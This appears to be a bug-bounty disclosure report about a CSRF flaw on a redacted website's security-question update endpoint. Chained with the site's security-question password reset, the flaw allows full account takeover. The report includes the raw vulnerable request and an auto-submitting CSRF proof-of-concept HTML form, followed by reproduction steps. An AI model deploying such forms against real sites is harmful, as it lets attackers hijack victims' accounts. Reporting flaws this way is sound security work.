CSRF Attack on changing security questions leads to full Account TakeOver

**Description:** Hii, While researching https://www.████/, I discovered that an attacker could exploit a CSRF vulnerability to perform a password reset and gain full control of any user's account. There is a feature in the user profile that allows users to change their security questions and answers. However, when the user changes this information, the application does not verify the CSRF token, resulting in a CSRF vulnerability in that functionality. Additionally, there is another functionality on the reset password. Users can change their password via the security questions. However, exploiting the previously mentioned vulnerability will lead to bypassing this feature and result in a 1-Click Account Takeover. ### Vulnerable Request ``` POST /member/updatesecurityquestions HTTP/2 Host: www.███████ Cookie: {YOUR-COOKIE} Content-Length: 170 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://www.██████████ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: https://www.██████/member/updatesecurityquestions Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 security_questions1=1&security_question_answer1=temp&security_questions2=2&security_question_answer2=temp&security_questions3=3&security_question_answer3=temp&submit=Save ``` ## References **Video PoC** ███████ ## Impact 1- CSRF Vulnerability on Changing Security Questions/Answers 2 - Account Takeover ## System Host(s) www.█████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce 1 - Create an Account on : `https://www.███/` 2 - Navigate to : `https://www.█████████/member/updatesecurityquestions` and update Security questions 3 - Intercept the request, Create CSRF PoC or you can use this ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://www.█████████/member/updatesecurityquestions" method="POST"> <input type="hidden" name="security&#95;questions1" value="1" /> <input type="hidden" name="security&#95;question&#95;answer1" value="hacked" /> <input type="hidden" name="security&#95;questions2" value="2" /> <input type="hidden" name="security&#95;question&#95;answer2" value="hacked" /> <input type="hidden" name="security&#95;questions3" value="3" /> <input type="hidden" name="security&#95;question&#95;answer3" value="hacked" /> <input type="hidden" name="submit" value="Save" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` 4 - Execute it in the browser, See that security questions have been changed. 5 - Now, navigate to another private window, go to `https://www.██████/forgotpassword/?redirect_to=%2Fmember%2Foptions%2Fcurrenttab%2Femail`, Observe an option **On Screen Reset** 6 - Since as an attacker, you know the victim's security questions & answers, hence put the right answers & you can change the victim's password. ## Suggested Mitigation/Remediation Actions